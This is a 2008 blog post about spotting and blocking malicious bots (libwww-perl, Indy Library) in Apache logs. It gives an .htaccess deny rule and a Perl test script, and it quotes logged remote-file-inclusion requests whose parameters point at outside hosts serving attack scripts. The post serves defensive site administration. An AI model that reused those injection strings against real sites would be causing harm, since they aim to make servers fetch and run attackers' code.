Here are some sample lines from our server logs ... and I don't like the look of them!
from 195.39.5.203 - Moravskoslezsky Kraj, Czech Republic [1000 miles] - libwww-perl/5.805
.net: /resources/recents.html/plugins/safeh...ms_files/images/id.txt???//index ... 16:44:24
from 91.187.115.253 - Vojvodina, Serbia [1295 miles] - Mozilla/3.0 (compatible; Indy Library)
.net: /resources/smap.php?adder=http://www.freewebs.com/atdheu-mc/raw.txt?/exa ... 16:45:17
Records like these - with "Indy Library" or "libwww-perl" in the name of the browser (which is also know as the "User Agent") - are very likely to be attempting to find a security hole in our site scripts, through which they can copy themselves onto our server and then continue to infect other systems, or to use our site to advertise their own by injecting their own URLs. So what are "Indy Library" and "libwww-perl"?
Indy Library usually comes from the Delphi/C++ Builder suite of tools. Someone has written an automated program using the library ...
libwww is from the Perl LWP (Library for WorldWideWeb in Perl) library, so in this case, it's probable that someone has written an automated program In Perl ...
Automated programs are a necessity - and indeed we welcome well behaved crawlers from the well known Google and Yahoo through to more obscure ones too, but authors of such crawlers who know properly what they're doing change the User Agent string rather than using the default - in my experience, we really
don't want the default crawlers on our site, which are at least 90% malicious, with the remaining 10% being amateur. So how can we turn them off?
Standard practise is to deny specific user agents via the robots.txt file -
but chances are that the naughty bots won't respect that so we need to enforce the rule!
Here are three lines that I've added to our
.htaccess file ...
SetEnvIfNoCase User-Agent "libwww-perl" naughty_boys
SetEnvIfNoCase User-Agent "Indy Library" naughty_boys
Deny from env=naughty_boys
Which will send out a
403 Forbidden message to the automata, telling them that they can't have the page they seek. Goodness knows what the receiveing bot will do with the error - but we can make our 403 'handler' simple, quick, secure, and light on bandwidth.
How do we test that?
Here's a simple Perl script that will declare itself as being libwww:
#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$req = HTTP::Request->new(GET => 'http://www.wellho.net/index.html');
$res = $ua->request($req);
if ($res->is_success) {
print $res->content;
} else {
print "Error: " . $res->status_line . "\n";
}
And when I run that, it now gives me:
-bash-3.2$ perl pg1
Error: 403 Forbidden
-bash-3.2$
If I add the line:
$ua->agent("Well House Consultants Bot");
into that program, I get a much more satisfying result back ...
-bash-3.2$ perl pg2
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<meta name="author" content="Lisa Ellis" />
And so on
Links - full source code of our test program without and with our own user agent being set.
One of the matters that I considered very carefully indeed before blocking these use agents was the possibility that I'm blocking some useful and important traffic as well as a lot of "nasties" - throwing out the baby with the bathwater if you like. Not the case, I believe - as most people who have legit babies take good care of them and name them properly, but I will be watching my log files none the less to check.
As I finished writing this article - some poetic justice from my log file ...
64.159.77.76 - - [12/Sep/2008:21:28:20 +0100] "GET /mouth/1542_Are-nasty- programs-looking-for-security-holes-on-your- server-.html/errors.php?error= http://vnc2008.webcindario.com/idr0x.txt??? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
Some automaton is looking to hack into a previous short article on security holes and firmly being denied access. (written 2008-09-13)
Associated topics are indexed as below, or enter http://melksh.am/nnnn for individual articles
A606 - Web Application Deployment - Apache httpd - log files and log tools [376] What brings people to my web site? - (2005-07-13)
[1237] What proportion of our web traffic is robots? - (2007-06-19)
[1503] Web page (http) error status 405 - (2008-01-12)
[1598] Every link has two ends - fixing 404s at the recipient - (2008-04-02)
[1656] Be careful of misreading server statistics - (2008-05-28)
[1761] Logging Cookies with the Apache httpd web server - (2008-08-20)
[1780] Server overloading - turns out to be feof in PHP - (2008-09-01)
[3015] Logging the performance of the Apache httpd web server - (2010-10-25)
[3019] Apache httpd Server Status - monitoring your server - (2010-10-28)
[3027] Server logs - drawing a graph of gathered data - (2010-11-03)
[3087] Making the most of critical emails - reading behind the scene - (2010-12-16)
[3443] Getting more log information from the Apache http web server - (2011-09-16)
[3447] Needle in a haystack - finding the web server overload - (2011-09-18)
[3491] Who is knocking at your web site door? Are you well set up to deal with allcomers? - (2011-10-21)
[3554] Learning more about our web site - and learning how to learn about yours - (2011-12-17)
[3670] Reading Google Analytics results, based on the relative populations of countries - (2012-03-24)
[3974] TV show appearance - how does it effect your web site? - (2013-01-13)
[3984] 20 minutes in to our 15 minutes of fame - (2013-01-20)
[4307] Identifying and clearing denial of service attacks on your Apache server - (2014-09-27)
[4404] Which (virtual) host was visited? Tuning Apache log files, and Python analysis - (2015-01-23)
[4491] Web Server Admin - some of those things that happen, and solutions - (2015-05-10)
Some other Articles
Spiders WebRegular Expressions in PHPWhat does an browser understand? What does an HTML document contain?I have been working hard but I do not expect you noticedlibwww-perl and Indy Library in your server logs?What have iTime, honeytrapagency and domain listing center got in common?Refactoring - a PHP demo becomes a production pageWhich country does a search engine think you are located in?All the pieces fall into place - hotel and coursesThe road ahead - Python 3